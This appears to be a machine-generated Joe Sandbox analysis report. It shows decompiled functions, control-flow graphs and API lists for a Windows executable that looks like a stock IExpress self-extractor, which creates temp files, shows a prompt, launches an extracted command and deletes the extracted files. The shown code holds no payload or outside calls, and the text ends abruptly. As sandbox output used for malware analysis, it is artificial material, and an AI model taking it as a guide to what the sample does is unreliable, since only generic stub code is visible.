                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 533 10e6a60-10e6a91 call 10e7155 call 10e7208 GetStartupInfoW 539 10e6a93-10e6aa2 533->539 540 10e6abc-10e6abe 539->540 541 10e6aa4-10e6aa6 539->541 544 10e6abf-10e6ac5 540->544 542 10e6aaf-10e6aba Sleep 541->542 543 10e6aa8-10e6aad 541->543 542->539 543->544 545 10e6ac7-10e6acf _amsg_exit 544->545 546 10e6ad1-10e6ad7 544->546 547 10e6b0b-10e6b11 545->547 548 10e6ad9-10e6ae9 call 10e6c3f 546->548 549 10e6b05 546->549 551 10e6b2e-10e6b30 547->551 552 10e6b13-10e6b24 _initterm 547->552 553 10e6aee-10e6af2 548->553 549->547 554 10e6b3b-10e6b42 551->554 555 10e6b32-10e6b39 551->555 552->551 553->547 558 10e6af4-10e6b00 553->558 556 10e6b67-10e6b71 554->556 557 10e6b44-10e6b51 call 10e7060 554->557 555->554 560 10e6b74-10e6b79 556->560 557->556 566 10e6b53-10e6b65 557->566 561 10e6c39-10e6c3e call 10e724d 558->561 564 10e6b7b-10e6b7d 560->564 565 10e6bc5-10e6bc8 560->565 570 10e6b7f-10e6b81 564->570 571 10e6b94-10e6b98 564->571 567 10e6bca-10e6bd3 565->567 568 10e6bd6-10e6be3 _ismbblead 565->568 566->556 567->568 572 10e6be9-10e6bed 568->572 573 10e6be5-10e6be6 568->573 570->565 574 10e6b83-10e6b85 570->574 575 10e6b9a-10e6b9e 571->575 576 10e6ba0-10e6ba2 571->576 572->560 579 10e6c1e-10e6c25 572->579 573->572 574->571 580 10e6b87-10e6b8a 574->580 577 10e6ba3-10e6bbc call 10e2bfb 575->577 576->577 577->579 586 10e6bbe-10e6bbf exit 577->586 582 10e6c27-10e6c2d _cexit 579->582 583 10e6c32 579->583 580->571 584 10e6b8c-10e6b92 580->584 582->583 583->561 584->574 586->565
                              C-Code - Quality: 51%
                              			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                              				signed int* _t25;
                              				signed int _t26;
                              				signed int _t29;
                              				int _t30;
                              				signed int _t37;
                              				signed char _t41;
                              				signed int _t53;
                              				signed int _t54;
                              				intOrPtr _t56;
                              				signed int _t58;
                              				signed int _t59;
                              				intOrPtr* _t60;
                              				void* _t62;
                              				void* _t67;
                              				void* _t68;
                              
                              				E010E7155();
                              				_push(0x58);
                              				_push(0x10e72b8);
                              				E010E7208(__ebx, __edi, __esi);
                              				 *(_t62 - 0x20) = 0;
                              				GetStartupInfoW(_t62 - 0x68);
                              				 *((intOrPtr*)(_t62 - 4)) = 0;
                              				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                              				_t53 = 0;
                              				while(1) {
                              					asm("lock cmpxchg [edx], ecx");
                              					if(0 == 0) {
                              						break;
                              					}
                              					if(0 != _t56) {
                              						Sleep(0x3e8);
                              						continue;
                              					} else {
                              						_t58 = 1;
                              						_t53 = 1;
                              					}
                              					L7:
                              					_t67 =  *0x10e88b0 - _t58; // 0x2
                              					if(_t67 != 0) {
                              						__eflags =  *0x10e88b0; // 0x2
                              						if(__eflags != 0) {
                              							 *0x10e81e4 = _t58;
                              							goto L13;
                              						} else {
                              							 *0x10e88b0 = _t58;
                              							_t37 = E010E6C3F(0x10e10b8, 0x10e10c4); // executed
                              							__eflags = _t37;
                              							if(__eflags == 0) {
                              								goto L13;
                              							} else {
                              								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                              								_t30 = 0xff;
                              							}
                              						}
                              					} else {
                              						_push(0x1f);
                              						L010E6FF4();
                              						L13:
                              						_t68 =  *0x10e88b0 - _t58; // 0x2
                              						if(_t68 == 0) {
                              							_push(0x10e10b4);
                              							_push(0x10e10ac);
                              							L010E7202();
                              							 *0x10e88b0 = 2;
                              						}
                              						if(_t53 == 0) {
                              							 *0x10e88ac = 0;
                              						}
                              						_t71 =  *0x10e88b4;
                              						if( *0x10e88b4 != 0 && E010E7060(_t71, 0x10e88b4) != 0) {
                              							_t60 =  *0x10e88b4; // 0x0
                              							 *0x10ea288(0, 2, 0);
                              							 *_t60();
                              						}
                              						_t25 = __imp___acmdln; // 0x76235b9c
                              						_t59 =  *_t25;
                              						 *(_t62 - 0x1c) = _t59;
                              						_t54 =  *(_t62 - 0x20);
                              						while(1) {
                              							_t41 =  *_t59;
                              							if(_t41 > 0x20) {
                              								goto L32;
                              							}
                              							if(_t41 != 0) {
                              								if(_t54 != 0) {
                              									goto L32;
                              								} else {
                              									while(_t41 != 0 && _t41 <= 0x20) {
                              										_t59 = _t59 + 1;
                              										 *(_t62 - 0x1c) = _t59;
                              										_t41 =  *_t59;
                              									}
                              								}
                              							}
                              							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                              							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                              								_t29 = 0xa;
                              							} else {
                              								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                              							}
                              							_push(_t29);
                              							_t30 = E010E2BFB(0x10e0000, 0, _t59); // executed
                              							 *0x10e81e0 = _t30;
                              							__eflags =  *0x10e81f8;
                              							if( *0x10e81f8 == 0) {
                              								exit(_t30); // executed
                              								goto L32;
                              							}
                              							__eflags =  *0x10e81e4;
                              							if( *0x10e81e4 == 0) {
                              								__imp___cexit();
                              								_t30 =  *0x10e81e0; // 0x0
                              							}
                              							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                              							goto L40;
                              							L32:
                              							__eflags = _t41 - 0x22;
                              							if(_t41 == 0x22) {
                              								__eflags = _t54;
                              								_t15 = _t54 == 0;
                              								__eflags = _t15;
                              								_t54 = 0 | _t15;
                              								 *(_t62 - 0x20) = _t54;
                              							}
                              							_t26 = _t41 & 0x000000ff;
                              							__imp___ismbblead(_t26);
                              							__eflags = _t26;
                              							if(_t26 != 0) {
                              								_t59 = _t59 + 1;
                              								__eflags = _t59;
                              								 *(_t62 - 0x1c) = _t59;
                              							}
                              							_t59 = _t59 + 1;
                              							 *(_t62 - 0x1c) = _t59;
                              						}
                              					}
                              					L40:
                              					return E010E724D(_t30);
                              				}
                              				_t58 = 1;
                              				__eflags = 1;
                              				goto L7;
                              			}


















                              0x010e6a60
                              0x010e6a6a
                              0x010e6a6c
                              0x010e6a71
                              0x010e6a78
                              0x010e6a7f
                              0x010e6a85
                              0x010e6a8e
                              0x010e6a91
                              0x010e6a93
                              0x010e6a9c
                              0x010e6aa2
                              0x00000000
                              0x00000000
                              0x010e6aa6
                              0x010e6ab4
                              0x00000000
                              0x010e6aa8
                              0x010e6aaa
                              0x010e6aab
                              0x010e6aab
                              0x010e6abf
                              0x010e6abf
                              0x010e6ac5
                              0x010e6ad1
                              0x010e6ad7
                              0x010e6b05
                              0x00000000
                              0x010e6ad9
                              0x010e6ad9
                              0x010e6ae9
                              0x010e6af0
                              0x010e6af2
                              0x00000000
                              0x010e6af4
                              0x010e6af4
                              0x010e6afb
                              0x010e6afb
                              0x010e6af2
                              0x010e6ac7
                              0x010e6ac7
                              0x010e6ac9
                              0x010e6b0b
                              0x010e6b0b
                              0x010e6b11
                              0x010e6b13
                              0x010e6b18
                              0x010e6b1d
                              0x010e6b24
                              0x010e6b24
                              0x010e6b30
                              0x010e6b39
                              0x010e6b39
                              0x010e6b3b
                              0x010e6b42
                              0x010e6b57
                              0x010e6b5f
                              0x010e6b65
                              0x010e6b65
                              0x010e6b67
                              0x010e6b6c
                              0x010e6b6e
                              0x010e6b71
                              0x010e6b74
                              0x010e6b74
                              0x010e6b79
                              0x00000000
                              0x00000000
                              0x010e6b7d
                              0x010e6b81
                              0x00000000
                              0x00000000
                              0x010e6b83
                              0x010e6b8c
                              0x010e6b8d
                              0x010e6b90
                              0x010e6b90
                              0x010e6b83
                              0x010e6b81
                              0x010e6b94
                              0x010e6b98
                              0x010e6ba2
                              0x010e6b9a
                              0x010e6b9a
                              0x010e6b9a
                              0x010e6ba3
                              0x010e6bab
                              0x010e6bb0
                              0x010e6bb5
                              0x010e6bbc
                              0x010e6bbf
                              0x00000000
                              0x010e6bbf
                              0x010e6c1e
                              0x010e6c25
                              0x010e6c27
                              0x010e6c2d
                              0x010e6c2d
                              0x010e6c32
                              0x00000000
                              0x010e6bc5
                              0x010e6bc5
                              0x010e6bc8
                              0x010e6bcc
                              0x010e6bce
                              0x010e6bce
                              0x010e6bd1
                              0x010e6bd3
                              0x010e6bd3
                              0x010e6bd6
                              0x010e6bda
                              0x010e6be1
                              0x010e6be3
                              0x010e6be5
                              0x010e6be5
                              0x010e6be6
                              0x010e6be6
                              0x010e6be9
                              0x010e6bea
                              0x010e6bea
                              0x010e6b74
                              0x010e6c39
                              0x010e6c3e
                              0x010e6c3e
                              0x010e6abe
                              0x010e6abe
                              0x00000000

                              APIs
                                • Part of subcall function 010E7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 010E7182
                                • Part of subcall function 010E7155: GetCurrentProcessId.KERNEL32 ref: 010E7191
                                • Part of subcall function 010E7155: GetCurrentThreadId.KERNEL32 ref: 010E719A
                                • Part of subcall function 010E7155: GetTickCount.KERNEL32 ref: 010E71A3
                                • Part of subcall function 010E7155: QueryPerformanceCounter.KERNEL32(?), ref: 010E71B8
                              • GetStartupInfoW.KERNEL32(?,010E72B8,00000058), ref: 010E6A7F
                              • Sleep.KERNEL32(000003E8), ref: 010E6AB4
                              • _amsg_exit.MSVCRT ref: 010E6AC9
                              • _initterm.MSVCRT ref: 010E6B1D
                              • __IsNonwritableInCurrentImage.LIBCMT ref: 010E6B49
                              • exit.KERNELBASE ref: 010E6BBF
                              • _ismbblead.MSVCRT ref: 010E6BDA
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                              • String ID:
                              • API String ID: 836923961-0
                              • Opcode ID: 61ac8d9d109f27df30314f3cfd927d5abf5d93f87a1b298f9481ce44dcc37277
                              • Instruction ID: 1abba974472e59e35631f0bba7cf7dfe9aa5dc7316f4ea2784cfc9b2f2562fd7
                              • Opcode Fuzzy Hash: 61ac8d9d109f27df30314f3cfd927d5abf5d93f87a1b298f9481ce44dcc37277
                              • Instruction Fuzzy Hash: E141C735A44365CFDF719B6FF90C76E7BE4AB54B10F14415EE9C19B280CB7A84808B80
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 587 10e58c8-10e58d5 588 10e58d8-10e58dd 587->588 588->588 589 10e58df-10e58f1 LocalAlloc 588->589 590 10e5919-10e5959 call 10e1680 call 10e658a CreateFileA LocalFree 589->590 591 10e58f3-10e5901 call 10e44b9 589->591 594 10e5906-10e5910 call 10e6285 590->594 601 10e595b-10e596c CloseHandle GetFileAttributesA 590->601 591->594 600 10e5912-10e5918 594->600 601->594 602 10e596e-10e5970 601->602 602->594 603 10e5972-10e597b 602->603 603->600
                              C-Code - Quality: 95%
                              			E010E58C8(intOrPtr* __ecx) {
                              				void* _v8;
                              				intOrPtr _t6;
                              				void* _t10;
                              				void* _t12;
                              				void* _t14;
                              				signed char _t16;
                              				void* _t20;
                              				void* _t23;
                              				intOrPtr* _t27;
                              				CHAR* _t33;
                              
                              				_push(__ecx);
                              				_t33 = __ecx;
                              				_t27 = __ecx;
                              				_t23 = __ecx + 1;
                              				do {
                              					_t6 =  *_t27;
                              					_t27 = _t27 + 1;
                              				} while (_t6 != 0);
                              				_t36 = _t27 - _t23 + 0x14;
                              				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                              				if(_t20 != 0) {
                              					E010E1680(_t20, _t36, _t33);
                              					E010E658A(_t20, _t36, "TMP4351$.TMP");
                              					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                              					_v8 = _t10;
                              					LocalFree(_t20);
                              					_t12 = _v8;
                              					if(_t12 == 0xffffffff) {
                              						goto L4;
                              					} else {
                              						CloseHandle(_t12);
                              						_t16 = GetFileAttributesA(_t33); // executed
                              						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                              							goto L4;
                              						} else {
                              							 *0x10e9124 = 0;
                              							_t14 = 1;
                              						}
                              					}
                              				} else {
                              					E010E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                              					L4:
                              					 *0x10e9124 = E010E6285();
                              					_t14 = 0;
                              				}
                              				return _t14;
                              			}













                              0x010e58cd
                              0x010e58d1
                              0x010e58d3
                              0x010e58d5
                              0x010e58d8
                              0x010e58d8
                              0x010e58da
                              0x010e58db
                              0x010e58e1
                              0x010e58ed
                              0x010e58f1
                              0x010e591e
                              0x010e592c
                              0x010e5943
                              0x010e594a
                              0x010e594d
                              0x010e5953
                              0x010e5959
                              0x00000000
                              0x010e595b
                              0x010e595c
                              0x010e5963
                              0x010e596c
                              0x00000000
                              0x010e5972
                              0x010e5974
                              0x010e597a
                              0x010e597a
                              0x010e596c
                              0x010e58f3
                              0x010e5901
                              0x010e5906
                              0x010e590b
                              0x010e5910
                              0x010e5910
                              0x010e5918

                              APIs
                              • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,010E5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E58E7
                              • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,010E5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E5943
                              • LocalFree.KERNEL32(00000000,?,010E5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E594D
                              • CloseHandle.KERNEL32(00000000,?,010E5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E595C
                              • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,010E5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E5963
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                              • API String ID: 747627703-1664176527
                              • Opcode ID: efe354bdbd4c105e75b91ccba9e0fea39f0ec8048caba0d87e734d73f83d807f
                              • Instruction ID: 9ca697ab06736a231533094b8cfa5b77cc717e1bc5258c7ce378bb753055aecc
                              • Opcode Fuzzy Hash: efe354bdbd4c105e75b91ccba9e0fea39f0ec8048caba0d87e734d73f83d807f
                              • Instruction Fuzzy Hash: 50112671700211AFD7345E7B6C4CADB7EDDDF8A664B000A59B5C5D72C4CA75D80587A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 631 10e3fef-10e4010 632 10e410a-10e411a call 10e6ce0 631->632 633 10e4016-10e403b CreateProcessA 631->633 634 10e40c4-10e4101 call 10e6285 GetLastError FormatMessageA call 10e44b9 633->634 635 10e4041-10e406e WaitForSingleObject GetExitCodeProcess 633->635 647 10e4106 634->647 637 10e4070-10e4077 635->637 638 10e4091 call 10e411b 635->638 637->638 642 10e4079-10e407b 637->642 646 10e4096-10e40b8 CloseHandle * 2 638->646 642->638 645 10e407d-10e4089 642->645 645->638 648 10e408b 645->648 649 10e40ba-10e40c0 646->649 650 10e4108 646->650 647->650 648->638 649->650 651 10e40c2 649->651 650->632 651->647
                              C-Code - Quality: 84%
                              			E010E3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                              				signed int _v8;
                              				char _v524;
                              				long _v528;
                              				struct _PROCESS_INFORMATION _v544;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t20;
                              				void* _t22;
                              				int _t25;
                              				intOrPtr* _t39;
                              				signed int _t44;
                              				void* _t49;
                              				signed int _t50;
                              				intOrPtr _t53;
                              
                              				_t45 = __edx;
                              				_t20 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t20 ^ _t50;
                              				_t39 = __ecx;
                              				_t49 = 1;
                              				_t22 = 0;
                              				if(__ecx == 0) {
                              					L13:
                              					return E010E6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                              				}
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                              				if(_t25 == 0) {
                              					 *0x10e9124 = E010E6285();
                              					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                              					_t45 = 0x4c4;
                              					E010E44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                              					L11:
                              					_t49 = 0;
                              					L12:
                              					_t22 = _t49;
                              					goto L13;
                              				}
                              				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                              				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                              				_t44 = _v528;
                              				_t53 =  *0x10e8a28; // 0x0
                              				if(_t53 == 0) {
                              					_t34 =  *0x10e9a2c; // 0x0
                              					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                              						_t34 = _t44 & 0xff000000;
                              						if((_t44 & 0xff000000) == 0xaa000000) {
                              							 *0x10e9a2c = _t44;
                              						}
                              					}
                              				}
                              				E010E411B(_t34, _t44);
                              				CloseHandle(_v544.hThread);
                              				CloseHandle(_v544);
                              				if(( *0x10e9a34 & 0x00000400) == 0 || _v528 >= 0) {
                              					goto L12;
                              				} else {
                              					goto L11;
                              				}
                              			}


















                              0x010e3fef
                              0x010e3ffa
                              0x010e4001
                              0x010e4008
                              0x010e400a
                              0x010e400b
                              0x010e4010
                              0x010e410a
                              0x010e411a
                              0x010e411a
                              0x010e401c
                              0x010e401d
                              0x010e401e
                              0x010e401f
                              0x010e4033
                              0x010e403b
                              0x010e40ca
                              0x010e40e9
                              0x010e40f8
                              0x010e4101
                              0x010e4106
                              0x010e4106
                              0x010e4108
                              0x010e4108
                              0x00000000
                              0x010e4108
                              0x010e4049
                              0x010e405c
                              0x010e4062
                              0x010e4068
                              0x010e406e
                              0x010e4070
                              0x010e4077
                              0x010e407f
                              0x010e4089
                              0x010e408b
                              0x010e408b
                              0x010e4089
                              0x010e4077
                              0x010e4091
                              0x010e409c
                              0x010e40a8
                              0x010e40b8
                              0x00000000
                              0x010e40c2
                              0x00000000
                              0x010e40c2

                              APIs
                              • CreateProcessA.KERNELBASE ref: 010E4033
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 010E4049
                              • GetExitCodeProcess.KERNELBASE ref: 010E405C
                              • CloseHandle.KERNEL32(?), ref: 010E409C
                              • CloseHandle.KERNEL32(?), ref: 010E40A8
                              • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010E40DC
                              • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 010E40E9
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                              • String ID:
                              • API String ID: 3183975587-0
                              • Opcode ID: a339ef117bee2d34e4715199f0b2a0a299b5ab62e34ce1b4857dab86e35af7b4
                              • Instruction ID: c9a7ca6f3d69e3b098b3ddce46bad10dbc1a1961632d82b46650e771452c72f0
                              • Opcode Fuzzy Hash: a339ef117bee2d34e4715199f0b2a0a299b5ab62e34ce1b4857dab86e35af7b4
                              • Instruction Fuzzy Hash: D3319E31640208AFEB709B67DC4CFAB7BF8EBD8B10F1001A9F685D6191C63688858B50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 652 10e51e5-10e520b call 10e468f LocalAlloc 655 10e522d-10e523c call 10e468f 652->655 656 10e520d-10e5228 call 10e44b9 call 10e6285 652->656 661 10e523e-10e5260 call 10e44b9 LocalFree 655->661 662 10e5262-10e5270 lstrcmpA 655->662 671 10e52b0 656->671 661->671 665 10e527e-10e529c call 10e44b9 LocalFree 662->665 666 10e5272-10e5273 LocalFree 662->666 674 10e529e-10e52a4 665->674 675 10e52a6 665->675 669 10e5279-10e527c 666->669 672 10e52b2-10e52b5 669->672 671->672 674->669 675->671
                              C-Code - Quality: 100%
                              			E010E51E5(void* __eflags) {
                              				int _t5;
                              				void* _t6;
                              				void* _t28;
                              
                              				_t1 = E010E468F("UPROMPT", 0, 0) + 1; // 0x1
                              				_t28 = LocalAlloc(0x40, _t1);
                              				if(_t28 != 0) {
                              					if(E010E468F("UPROMPT", _t28, _t29) != 0) {
                              						_t5 = lstrcmpA(_t28, "<None>"); // executed
                              						if(_t5 != 0) {
                              							_t6 = E010E44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                              							LocalFree(_t28);
                              							if(_t6 != 6) {
                              								 *0x10e9124 = 0x800704c7;
                              								L10:
                              								return 0;
                              							}
                              							 *0x10e9124 = 0;
                              							L6:
                              							return 1;
                              						}
                              						LocalFree(_t28);
                              						goto L6;
                              					}
                              					E010E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                              					LocalFree(_t28);
                              					 *0x10e9124 = 0x80070714;
                              					goto L10;
                              				}
                              				E010E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                              				 *0x10e9124 = E010E6285();
                              				goto L10;
                              			}






                              0x010e51fb
                              0x010e5207
                              0x010e520b
                              0x010e523c
                              0x010e5268
                              0x010e5270
                              0x010e528b
                              0x010e5293
                              0x010e529c
                              0x010e52a6
                              0x010e52b0
                              0x00000000
                              0x010e52b0
                              0x010e529e
                              0x010e5279
                              0x00000000
                              0x010e527b
                              0x010e5273
                              0x00000000
                              0x010e5273
                              0x010e524a
                              0x010e5250
                              0x010e5256
                              0x00000000
                              0x010e5256
                              0x010e5219
                              0x010e5223
                              0x00000000

                              APIs
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
                                • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010E2F4D,?,00000002,00000000), ref: 010E5201
                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 010E5250
                                • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                • Part of subcall function 010E6285: GetLastError.KERNEL32(010E5BBC), ref: 010E6285
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                              • String ID: <None>$UPROMPT
                              • API String ID: 957408736-2980973527
                              • Opcode ID: 9669a2a982c3f5bb1b1a974f5824fd3355ae463faeaf561fa05f313489acdecc
                              • Instruction ID: 2ef279feae4561338a3073a1ec9ca435e35867b0030113018d811bd1d303ef90
                              • Opcode Fuzzy Hash: 9669a2a982c3f5bb1b1a974f5824fd3355ae463faeaf561fa05f313489acdecc
                              • Instruction Fuzzy Hash: 8B11B6B5700201EFD3756B779C4CB7B65DDEB8DB98B00486DB6C2DA284DA7ECC014224
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 74%
                              			E010E52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                              				signed int _v8;
                              				char _v268;
                              				signed int _t9;
                              				signed int _t11;
                              				void* _t21;
                              				void* _t29;
                              				CHAR** _t31;
                              				void* _t32;
                              				signed int _t33;
                              
                              				_t28 = __edi;
                              				_t22 = __ecx;
                              				_t21 = __ebx;
                              				_t9 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t9 ^ _t33;
                              				_push(__esi);
                              				_t31 =  *0x10e91e0; // 0x34b71c0
                              				if(_t31 != 0) {
                              					_push(__edi);
                              					do {
                              						_t29 = _t31;
                              						if( *0x10e8a24 == 0 &&  *0x10e9a30 == 0) {
                              							SetFileAttributesA( *_t31, 0x80); // executed
                              							DeleteFileA( *_t31); // executed
                              						}
                              						_t31 = _t31[1];
                              						LocalFree( *_t29);
                              						LocalFree(_t29);
                              					} while (_t31 != 0);
                              					_pop(_t28);
                              				}
                              				_t11 =  *0x10e8a20; // 0x0
                              				_pop(_t32);
                              				if(_t11 != 0 &&  *0x10e8a24 == 0 &&  *0x10e9a30 == 0) {
                              					_push(_t22);
                              					E010E1781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                              					if(( *0x10e9a34 & 0x00000020) != 0) {
                              						E010E65E8( &_v268);
                              					}
                              					SetCurrentDirectoryA(".."); // executed
                              					_t22 =  &_v268;
                              					E010E2390( &_v268);
                              					_t11 =  *0x10e8a20; // 0x0
                              				}
                              				if( *0x10e9a40 != 1 && _t11 != 0) {
                              					_t11 = E010E1FE1(_t22); // executed
                              				}
                              				 *0x10e8a20 =  *0x10e8a20 & 0x00000000;
                              				return E010E6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                              			}












                              0x010e52b6
                              0x010e52b6
                              0x010e52b6
                              0x010e52c1
                              0x010e52c8
                              0x010e52cb
                              0x010e52cc
                              0x010e52d4
                              0x010e52d6
                              0x010e52d7
                              0x010e52de
                              0x010e52e0
                              0x010e52f2
                              0x010e52fa
                              0x010e52fa
                              0x010e5302
                              0x010e5305
                              0x010e530c
                              0x010e5312
                              0x010e5316
                              0x010e5316
                              0x010e5317
                              0x010e531c
                              0x010e531f
                              0x010e5333
                              0x010e5345
                              0x010e5351
                              0x010e5359
                              0x010e5359
                              0x010e5363
                              0x010e5369
                              0x010e536f
                              0x010e5374
                              0x010e5374
                              0x010e5381
                              0x010e5387
                              0x010e5387
                              0x010e538f
                              0x010e53a0

                              APIs
